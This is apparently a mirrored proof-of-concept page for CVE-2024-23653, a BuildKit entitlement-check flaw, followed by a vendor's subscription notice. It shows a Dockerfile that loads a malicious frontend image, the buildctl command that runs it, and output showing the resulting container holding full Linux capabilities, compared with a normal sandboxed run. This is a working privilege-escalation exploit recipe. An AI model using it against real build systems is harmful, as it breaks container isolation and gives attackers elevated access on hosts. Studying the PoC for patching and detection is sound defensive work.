CVE-2024-23653 PoC — BuildKit interactive containers API does not validate entitlements check

Source

https://github.com/666asd/CVE-2024-23653

Associated Vulnerability

Title:BuildKit interactive containers API does not validate entitlements check (CVE-2024-23653)
Description:BuildKit is a toolkit for converting source code to build artifacts in an efficient, expressive and repeatable manner. In addition to running containers as build steps, BuildKit also provides APIs for running interactive containers based on built images. It was possible to use these APIs to ask BuildKit to run a container with elevated privileges. Normally, running such containers is only allowed if special `security.insecure` entitlement is enabled both by buildkitd configuration and allowed by the user initializing the build request. The issue has been fixed in v0.12.5 . Avoid using BuildKit frontends from untrusted sources.

Readme

```dockerfile
#syntax=docker.io/zdfa/evilerfile
FROM alpine
RUN grep Cap /proc/self/status
```

```shell
sudo bin/buildctl build \
    --frontend=dockerfile.v0 \
    --local context=. \
    --local dockerfile=.
```

```
➜  cp sudo bin/buildctl build \
    --frontend=dockerfile.v0 \
    --local context=. \
    --local dockerfile=.
[+] Building 5.3s (6/6) FINISHED
 => [internal] load .dockerignore                                                                                                                                                      0.0s
 => => transferring context: 2B                                                                                                                                                        0.0s
 => [internal] load build definition from Dockerfile                                                                                                                                   0.0s
 => => transferring dockerfile: 114B                                                                                                                                                   0.0s
 => resolve image config for docker.io/zdfa/evilerfile:latest                                                                                                                          1.0s
 => CACHED docker-image://docker.io/zdfa/evilerfile@sha256:975b2fdd3a6d0d50db671f82af88b5b88f90335441924c9fa1a3ba8e1ff0785e                                                            0.0s
 => => resolve docker.io/zdfa/evilerfile@sha256:975b2fdd3a6d0d50db671f82af88b5b88f90335441924c9fa1a3ba8e1ff0785e                                                                       0.0s
 => docker-image://docker.io/library/alpine:latest                                                                                                                                     4.0s
 => => resolve docker.io/library/alpine:latest                                                                                                                                         4.0s
 => [auth] library/alpine:pull token for registry-1.docker.io                                                                                                                          0.0s
Dockerfile:1
--------------------
   1 | >>> #syntax=docker.io/zdfa/evilerfile
   2 |     FROM alpine
   3 |     RUN grep Cap /proc/self/status
--------------------
error: failed to solve: grep Cap /proc/self/status
grep Cap /proc/self/status
% grep Cap /proc/self/status
CapInh: 000001ffffffffff
CapPrm: 000001ffffffffff
CapEff: 000001ffffffffff
CapBnd: 000001ffffffffff
CapAmb: 000001ffffffffff
% exit 99

: exit code: 99
^[[44;3R%
```

```dockerfile
#syntax=docker.io/zdfa/evilerfile
FROM alpine as sandbox
RUN grep Cap /proc/self/status
```
```shell
➜  cp sudo bin/buildctl build \
    --frontend=dockerfile.v0 \
    --local context=. \
    --local dockerfile=.
[+] Building 2.8s (7/7) FINISHED
 => [internal] load build definition from Dockerfile                                                                                                                                   0.1s
 => => transferring dockerfile: 125B                                                                                                                                                   0.0s
 => [internal] load .dockerignore                                                                                                                                                      0.0s
 => => transferring context: 2B                                                                                                                                                        0.0s
 => resolve image config for docker.io/zdfa/evilerfile:latest                                                                                                                          2.0s
 => [auth] zdfa/evilerfile:pull token for registry-1.docker.io                                                                                                                         0.0s
 => CACHED docker-image://docker.io/zdfa/evilerfile@sha256:975b2fdd3a6d0d50db671f82af88b5b88f90335441924c9fa1a3ba8e1ff0785e                                                            0.0s
 => => resolve docker.io/zdfa/evilerfile@sha256:975b2fdd3a6d0d50db671f82af88b5b88f90335441924c9fa1a3ba8e1ff0785e                                                                       0.0s
 => CACHED docker-image://docker.io/library/alpine:latest                                                                                                                              0.5s
 => => resolve docker.io/library/alpine:latest                                                                                                                                         0.5s
 => [auth] library/alpine:pull token for registry-1.docker.io                                                                                                                          0.0s
Dockerfile:1
--------------------
   1 | >>> #syntax=docker.io/zdfa/evilerfile
   2 |     FROM alpine as sandbox
   3 |     RUN grep Cap /proc/self/status
--------------------
error: failed to solve: grep Cap /proc/self/status
grep Cap /proc/self/status
% grep Cap /proc/self/status
CapInh: 0000000000000000
CapPrm: 00000000a80425fb
CapEff: 00000000a80425fb
CapBnd: 00000000a80425fb
CapAmb: 0000000000000000
% exit 99

: exit code: 99
^[[44;3R%
```

File Snapshot


 [4.0K]  /data/pocs/6e5d3c5a164d484fedd9fc607728ae3ce55938f0
├── [4.0K]  cmd
│   └── [4.0K]  eviler
│       └── [3.8K]  main.go
├── [ 300]  Dockerfile
├── [ 122]  go.mod
├── [322K]  go.sum
└── [5.4K]  README.md

2 directories, 5 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →